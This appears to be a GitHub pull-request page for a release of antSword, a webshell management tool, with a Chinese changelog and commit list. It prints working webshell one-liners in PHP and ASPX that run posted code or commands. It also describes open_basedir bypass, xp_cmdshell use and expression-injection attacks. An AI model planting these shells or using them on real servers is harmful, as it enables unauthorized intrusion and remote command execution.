Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

release v2.1.15 #316

Merged
merged 36 commits into from
Jul 17, 2022
Merged

release v2.1.15 #316

merged 36 commits into from
Jul 17, 2022

Conversation

Medicean
Copy link
Collaborator

核心

  • 修复 PHP/PHP4 当前目录不可写时 bypass open_basedir 失败的 Bug
  • 新增 PHPRAW 类型, 该类型支持的 WebShell 类似如下代码:
<?php eval(file_get_contents("php://input"));?>

为了方便直连 Behinder3 WebShell, 编码器已内置。

  • 新增 ASPXCSharp 类型

该类型支持的 WebShell 类似如下代码:

<%@ Page Language="c#"%>
<%
  String Payload = Request.Form["ant"];
  if (Payload != null)
  {
    System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));
    assembly.CreateInstance(assembly.GetName().Name + ".Run").Equals(null);
  }
%>

有关该类型的设计说明, 请参考聊聊新类型ASPXCSharp

  • 新增 PSWindows 类型,与 CMDLinux 类似

基于命令执行的一句话类型, 仅支持 Windows 环境

该类型支持的 WebShell 类似如下代码:

<?php system($_POST["ant"]);?>

有关 PSWindows 的一些注意事项和原理说明, 请参考新类型 PSWindows 预览

  • JSPJS 兼容各种表达式注入

具体请看 spelbase64、el、ognl 这三个内置编码器样例, 详细请参考Java表达式注入的武器化利用

数据管理

勾选该选项后,只会发送 pwd 键下的内容,不会发送键值
目前生效的类型有: 「PHPRAW」、「CMDLinux」、「PSWindows」、「JSPJS」

主要场景如下:

// 连接类型 CMDLinux, 勾选 「Body 设置为 RAW 模式」后可连接
<?php system(file_get_contents("php://input"));?>

文件管理

  • 新增 FileHash 计算目标文件 hash 功能

该功能目前正在逐步适配所有类型中 , 目前已经适配 PHP/PHP4/PSWindows/CMDLinux/JSP/JSPJS

后端模块

  • 支持自定义 Content-Type, 默认是 form

superagent 支持的 type 简写如下, 当然也支持填写全称:

html: 'text/html',
json: 'application/json',
xml: 'text/xml',
urlencoded: 'application/x-www-form-urlencoded',
form: 'application/x-www-form-urlencoded',
form-data: 'application/x-www-form-urlencoded'

由于 ASP/ASPX/ASPXCharp/PHP/JSP/CUSTOM 类型每次请求时为多个参数,WebSocket连接之后Server端解析会较为困难,所以当前仅支持「RAW」类型: 「PHPRAW」、「CMDLinux」、「PSWindows」、「JSPJS」,未来会支持基于 defineClass 的 JSPRAW 类型

wsMemShell 项目中的 wscmd 为例:

URL: ws://127.0.0.1:8080/demoendpoint
PWD: 随便填写
连接类型: CMDLinux
Encoder: default (明文, 这个是WebShell端决定的)
Decoder: 根据情况自由选择

注意: 由于 antSword 历史设计原因,WebSocket 连接方式暂时只能每次操作都重新建立一次连接,在传输结束后自动与Server端断开

设置模块

  • 优化了新增Core类型时,编码设置解析逻辑, 现在不需要再改该模块的源代码了
  • 优化全局代理设置, 代理在设置完后不需要再重启了

其它

如需自己更新请下载后替换 static/libs/qqwry.dat 文件

  • 升级 superagent 到 6.1.0 (再高的版本需要高版本Electron支持)
  • 升级 superagent-proxy 到 v3.0.0

Medicean and others added 30 commits September 8, 2021 23:01
@Medicean
(Enhance: Core/PHPRAW) 新增 phpraw 类型
be33447
@Medicean
(Enhance: Settings/Encoder) 优化了新增 Core 类型时,编码设置模块解析的逻辑
d999e50
@Medicean
Merge branch 'master' into v2.1.x
9d16e7b
@yzddmr6
(Enhance: Core/ASPXCSHARP) 新增 aspxcsharp类型
d2d848c
@Medicean
(Fix: Core/php) 修复 auto bypass openbasedir 问题
69fcf83
@Medicean
(Fix: Modules/Database/phpraw) 修复 phpraw 数据管理无法使用的问题
6abc7ca
@ca3tie1 @Medicean
解决ASP连SQLSERVER执行xp_cmdshell爆"驱动程序不支持所需的属性的"问题
c07eb3e
@Medicean
Bump tar from 4.4.6 to 4.4.18
964330e
@Medicean
Merge branch 'v2.2.x' into v2.1.x
a8ac09d
@yzddmr6
(Enhance: Core/ASPXCSHARP) 兼容内存马,动态获取类名,修复数据库获取列名的BUG
166c600
@Medicean
Merge branch 'v2.2.x' into v2.1.x
2373fa8
@yzddmr6
(Update: Core/ASPXCSHARP) CSHARP更新至v1.2
9b71570
@Medicean
Merge remote-tracking branch 'origin/v2.2.x' into v2.1.x
235450e
@yzddmr6
(Enhance:Core/JSPJS)兼容各种表达式注入
797562b
@Medicean
Merge branch 'master' into v2.1.x
8e58206
@Medicean
(Enhance: Modules/ShellManager): 优化插件快捷设置,修正过多快捷设置后对UI影响(Fix #303)
730b02b
@Medicean
Merge branch 'master' into v2.1.x
08e3be9
@yzddmr6
Merge pull request #310 from AntSwordProject/v2.2.x
6edb731 
(Enhance:Core/JSPJS)兼容各种表达式注入
@Medicean
(New: Core/PSWindows) 新增 PSWindows 连接类型
dc3c168
@Medicean
(Enhance: Modules/Filemanager) 新增 FileHash 支持(php/pswindows)
1b0e53f
@Medicean
(Fix: Core/PSWindows/Database): 修正数据库类型转换错误
d9ce7eb
@Medicean
(Enhance: Core/CMDLinux) support filehash
9bc9567
@Medicean
(Fix: Core/JSP) 修正 mysql 表名中有特殊符号时执行异常的问题
0267e0c
@Medicean
(Enhance: Core/JSP): support filehash
c1d4b77
@Medicean
(Enhance: Core/JSPJS): support filehash
9a92377
@Medicean
Upgrade(ThirdParty): upgrade superagent-proxy to v3.0.0
21859b7
@Medicean
Upgrade(Aproxy): aproxy 设置后不需要再重启了
47a62f3
@Medicean
Upgrade(ThirdParty): 升级 superagent 到 6.1.0 (再高的版本需要高版本Electron支持)
6607a2d
@Medicean
Code(Modules/request): 调整 superagent ignoreHTTPS 注入,避免 npm upgrade之后引发问题
035ddb5
@Medicean
Enhance(Core/PHP): 数据库附加字段从明文改为newbase64
82ab2d0
@Medicean Medicean merged commit 78b5d97 into master Jul 17, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
3 participants
@Medicean @yzddmr6 @ca3tie1